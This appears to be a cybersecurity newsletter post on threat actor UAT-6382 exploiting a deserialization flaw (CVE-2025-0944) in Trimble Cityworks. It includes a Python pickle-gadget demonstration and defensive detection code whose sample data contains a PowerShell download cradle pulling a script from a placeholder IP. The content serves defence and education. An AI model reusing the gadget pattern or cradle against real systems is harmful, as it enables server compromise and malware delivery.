
UAT-6382 Exploits Trimble Cityworks Flaw to Deploy Cobalt Strike and VShell

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

A newly identified threat actor, tracked as UAT-6382, has been linked to a campaign exploiting a critical vulnerability in Trimble Cityworks, asset management software widely used by local governments in the United States. Cisco Talos, which discovered the activity, attributes it to a Chinese-speaking group; the campaign stands out for its methodical exploitation chain and its mix of custom and off-the-shelf malware.

What Is Trimble Cityworks?

Trimble Cityworks is a GIS-centric asset and work management platform used widely by municipalities for utility services and infrastructure maintenance. Its integration into essential civic operations makes it a valuable target for cyber threat actors seeking to disrupt or surveil public services.

The Vulnerability: CVE-2025-0944

The campaign hinges on a critical flaw, CVE-2025-0944, a deserialization-of-untrusted-data vulnerability. Because the application reconstructs objects from data an attacker controls, a crafted payload lets the attacker execute arbitrary code on the server. The flaw carries a CVSS score of 8.6 and was added to the CISA Known Exploited Vulnerabilities (KEV) catalog in February 2025.

Technical Summary

  • CVE Identifier: CVE-2025-0944

  • Impact: Remote Code Execution (RCE)

  • Severity: High (CVSS 8.6)

  • Affected Software: Trimble Cityworks prior to 15.8.9, and Cityworks with Office Companion prior to 23.10 (fixed in those releases)

  • Weakness: Deserialization of untrusted data (CWE-502), reachable over the network through the application's web interface
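To make the "deserialization of untrusted data" label concrete, the following Python is an added illustration of the weakness class in its simplest form. It is not Cityworks code (Cityworks is not a Python application) and does not reproduce the specific gadget behind CVE-2025-0944, which this post does not describe; the `Gadget` class, the allow-list in `RestrictedUnpickler` and the sample payloads are assumptions for the demonstration. The vulnerable loader runs an attacker-chosen command purely by loading bytes; the two hardened variants show the mitigations that generalize to any stack: an allow-list of resolvable types, or a data-only format plus a shape check.

```python
import io
import json
import os
import pickle

# Illustrative only: the same pattern (a serializer that can reference arbitrary
# classes or callables) is what makes deserialization bugs in any stack an RCE.

class Gadget:
    """Attacker-controlled class. pickle stores the result of __reduce__, so the
    *loader*, not the sender, calls os.system(...) while rebuilding the object.
    The command is harmless here; in an attack it would stage a web shell."""
    def __reduce__(self):
        return (os.system, ("echo gadget executed on the server",))

def build_malicious_blob():
    """What the attacker sends: plain bytes. Nothing runs on the sender's side."""
    return pickle.dumps(Gadget())

def benign_blob():
    """A legitimate payload of the shape the application actually expects (assumed)."""
    return pickle.dumps({"asset": "pump-7", "count": 2})

def vulnerable_load(blob):
    """Vulnerable pattern: deserialize whatever the client sent.
    Returns os.system's exit status (0) because the gadget ran."""
    return pickle.loads(blob)

class RestrictedUnpickler(pickle.Unpickler):
    """Hardened pattern 1: allow-list the globals a pickle may reference.
    Any GLOBAL/STACK_GLOBAL opcode outside the list aborts the load."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"),
               ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")

def restricted_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()

def is_rejected_by_restricted_loader(blob):
    try:
        restricted_load(blob)
        return False
    except pickle.UnpicklingError:
        return True

def json_load(text, expected_keys):
    """Hardened pattern 2 (preferred): a data-only format plus a shape check.
    JSON cannot name a class or function, so there is no gadget to reach."""
    obj = json.loads(text)
    if not isinstance(obj, dict) or set(obj) != set(expected_keys):
        raise ValueError("unexpected payload shape")
    return obj

if __name__ == "__main__":
    blob = build_malicious_blob()
    print("vulnerable loader:", vulnerable_load(blob))          # command runs, prints 0
    print("restricted loader rejects gadget:", is_rejected_by_restricted_loader(blob))
    print("restricted loader accepts data:", restricted_load(benign_blob()))
    print("json loader:", json_load('{"asset": "pump-7", "count": 2}', ["asset", "count"]))
```

The point to take away when auditing web-facing assets: the attacker never needs their own code to run anywhere except inside the victim's deserializer, so input "validation" that inspects fields after loading is too late. The fix has to constrain what the loader can resolve, or remove the loader entirely.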

Attack Timeline and Objectives

According to Cisco Talos, attacks began in January 2025, targeting the enterprise networks of U.S. local governments. Once access was gained through exploitation of the vulnerability, UAT-6382 conducted reconnaissance activities aimed at identifying systems involved in utility management—a clear indication of strategic targeting.

Key Actions Performed by UAT-6382:

  1. Exploited CVE-2025-0944 to gain access

  2. Conducted reconnaissance to identify utility-related systems

  3. Deployed web shells and malware for persistence

  4. Used PowerShell to download and install additional backdoors, then moved laterally within the network

Malware and Tools Used

UAT-6382 used a combination of open-source tools and custom-built malware to achieve and maintain persistence in compromised environments.

Web Shells

The attackers installed several well-known web shells commonly used by Chinese-speaking hacking groups, including:

  • AntSword

  • Chopper (chinatso/Chopper)

  • Behinder

These shells gave UAT-6382 backdoor access, allowing command execution and file manipulation over ordinary HTTP requests to the compromised web server.

Malware Loaders and RATs

  • TetraLoader: A Rust-based loader used to deploy the other payloads. It was built with MaLoader, a malware-building framework written in Simplified Chinese.

  • Cobalt Strike: A commercial adversary-emulation framework whose beacons are routinely repurposed by threat actors for command-and-control (C2).

  • VShell: A Go-based remote access tool used to maintain long-term access to the compromised environment.

These tools enabled the attackers to perform lateral movement, exfiltrate data, and potentially monitor operational utility systems.

Exfiltration and Persistence Techniques

Once inside the system, UAT-6382 took steps to identify directories and files of interest, particularly those related to infrastructure operations. Files were staged in known directories associated with the deployed web shells to facilitate quick and covert data exfiltration.

Additional Techniques:

  • Directory enumeration to identify high-value targets

  • Use of PowerShell to download and install multiple backdoors

  • File staging for streamlined data theft

Implications and Recommendations

The exploitation of a critical vulnerability in software that supports civic infrastructure represents a serious threat to public services and local government operations. The campaign's strategic focus on utility management underscores the importance of safeguarding critical infrastructure.

Who Should Be Concerned?

  • Local governments

  • Utility service providers

  • Public sector IT administrators

  • Organizations using Trimble Cityworks

How to Defend Against This Threat

  • Patch immediately: Update every instance of Trimble Cityworks to a release that contains the fix for CVE-2025-0944, per Trimble's advisory.

  • Monitor for IoCs: Refer to Trimble's and Cisco Talos' published indicators of compromise (IoCs), and hunt for web shells (unexpected .aspx/.ashx files) in the application's web root.

  • Restrict PowerShell use: Enforce script block logging and application control (AppLocker or WDAC), and alert on the web server worker process (w3wp.exe on IIS) spawning cmd.exe or powershell.exe, which is how a web shell executes commands.

  • Deploy endpoint monitoring tools: Utilize EDR solutions to detect unauthorized lateral movement and malware deployments.

  • Conduct security audits: Review existing web-facing assets for other potential deserialization or remote-code-execution flaws.
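The defensive list above maps to two concrete detections for the chain this post describes: web shell traffic to the application and the web server's worker process launching PowerShell download cradles. The following Python is an added example, not part of the original post or of the Talos report, and runs over constructed sample telemetry rather than real logs. The endpoint baseline, the list of content directories and the User-Agent substring are assumptions for the demo (AntSword's default User-Agent is `antSword/v2.1`, which an operator can change, so it is a weak signal on its own).

```python
import re
from dataclasses import dataclass

# Constructed IIS W3C-style log lines (date time cs-method cs-uri-stem sc-status cs(User-Agent)).
IIS_LOG = """\
2025-01-21 03:12:07 GET /cityworks/login.aspx 200 Mozilla/5.0
2025-01-21 03:12:09 POST /cityworks/login.aspx 302 Mozilla/5.0
2025-01-21 03:14:40 POST /cityworks/images/ant.aspx 200 antSword/v2.1
2025-01-21 03:15:02 POST /cityworks/temp/x.ashx 200 Mozilla/5.0
2025-01-21 03:15:30 GET /cityworks/css/site.css 200 Mozilla/5.0
"""

# Assumed per-deployment baseline: script endpoints the application legitimately serves.
KNOWN_ENDPOINTS = {"/cityworks/login.aspx", "/cityworks/default.aspx"}
# Assumed: directories that hold content or uploads and should never execute scripts.
STATIC_DIRS = ("/images/", "/css/", "/temp/", "/uploads/")
SCRIPT_EXT = re.compile(r"\.(aspx|ashx|asmx|asp)$", re.I)

def suspicious_web_requests(log_text):
    """Flag POSTs to script endpoints outside the baseline: the traffic pattern of a
    dropped web shell. Returns a list of (uri, reason)."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        method, uri, user_agent = parts[2], parts[3].lower(), parts[5].lower()
        if method != "POST" or not SCRIPT_EXT.search(uri) or uri in KNOWN_ENDPOINTS:
            continue
        reasons = ["POST to script endpoint not in baseline"]
        if any(d in uri for d in STATIC_DIRS):
            reasons.append("script file under a content/upload directory")
        if "antsword" in user_agent:          # AntSword's default UA; trivially changed
            reasons.append("AntSword default User-Agent")
        hits.append((parts[3], "; ".join(reasons)))
    return hits

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

# Constructed process-creation events in the shape of Sysmon Event ID 1 / EDR telemetry.
PROC_EVENTS = [
    ProcEvent("w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("w3wp.exe", "powershell.exe",
              "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.5/a.ps1')"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell Get-Date"),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

WEB_WORKERS = {"w3wp.exe"}                   # IIS worker process
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|certutil|-enc(odedcommand)?\b",
    re.I)

def suspicious_process_events(events):
    """Flag a web server worker spawning a shell (web shell command execution) and
    PowerShell download cradles (backdoor delivery). Returns (command_line, reason)."""
    hits = []
    for ev in events:
        parent, image = ev.parent_image.lower(), ev.image.lower()
        reasons = []
        if parent in WEB_WORKERS and image in SHELLS:
            reasons.append("IIS worker process spawned a shell")
        if image in {"powershell.exe", "pwsh.exe"} and CRADLE.search(ev.command_line):
            reasons.append("PowerShell download cradle")
        if reasons:
            hits.append((ev.command_line, "; ".join(reasons)))
    return hits

if __name__ == "__main__":
    for uri, why in suspicious_web_requests(IIS_LOG):
        print(f"[web]  {uri}: {why}")
    for cmd, why in suspicious_process_events(PROC_EVENTS):
        print(f"[proc] {cmd[:60]}: {why}")
```

The process-lineage check is the more robust of the two: a web shell can be renamed, and its client can spoof any User-Agent, but it still has to make the web server's worker process run a command, which is almost never legitimate for an application like this and is cheap to alert on in any EDR.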

Conclusion

UAT-6382’s exploitation of Trimble Cityworks marks another instance of sophisticated cyber campaigns targeting municipal infrastructure. Through strategic exploitation, persistent access tools, and methodical reconnaissance, this campaign highlights the evolving threat landscape and the growing need for proactive defense in the public sector.